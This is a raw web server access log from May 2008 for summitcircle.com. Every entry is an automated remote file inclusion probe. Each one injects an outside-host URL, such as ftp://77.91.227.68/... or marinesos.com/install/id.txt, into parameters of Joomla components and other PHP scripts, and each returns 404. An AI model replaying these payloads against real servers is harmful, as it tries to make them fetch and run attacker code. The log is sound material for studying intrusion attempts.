200.1.202.61 - - [18/May/2008:19:18:12 -0700] "GET /sub.php?menu=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
88.191.12.23 - - [18/May/2008:19:18:50 -0700] "GET //Sources/Packages.php?sourcedir=http://america.red-latina.org/suspended.page/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
67.19.61.90 - - [18/May/2008:19:19:42 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.summitcircle.com"
67.19.61.90 - - [18/May/2008:19:19:54 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.geocities.com/demon.bubble/on.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.summitcircle.com"
74.220.207.181 - - [18/May/2008:19:19:54 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "summitcircle.com"
125.141.229.10 - - [18/May/2008:19:20:05 -0700] "GET /logs/access_071224.log/index.php?body=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
122.201.81.75 - - [18/May/2008:19:20:12 -0700] "GET /logs/access_071224.log/index.php?body=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
87.230.10.251 - - [18/May/2008:19:20:12 -0700] "GET //components/com_joomlaboard/file_upload.php?sbp=http://marinesos.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
216.139.221.64 - - [18/May/2008:19:20:23 -0700] "GET /logs/access_071231.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.203.223.93 - - [18/May/2008:19:20:23 -0700] "GET //inc/header.php/step_one.php?server_inc=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.summitcircle.com"
213.203.223.93 - - [18/May/2008:19:20:23 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.summitcircle.com"
74.55.6.34 - - [18/May/2008:19:20:39 -0700] "GET //Full_Release/include/body_comm.inc.php?content=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.summitcircle.com"
74.55.6.34 - - [18/May/2008:19:20:39 -0700] "GET /logs//Full_Release/include/body_comm.inc.php?content=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.summitcircle.com"
217.67.26.84 - - [18/May/2008:19:21:14 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
217.67.26.84 - - [18/May/2008:19:21:14 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:19:21:16 -0700] "GET /logs/access_071224.log/index.php?Language=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:19:21:16 -0700] "GET /index.php?Language=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com" 85.18.11.77 -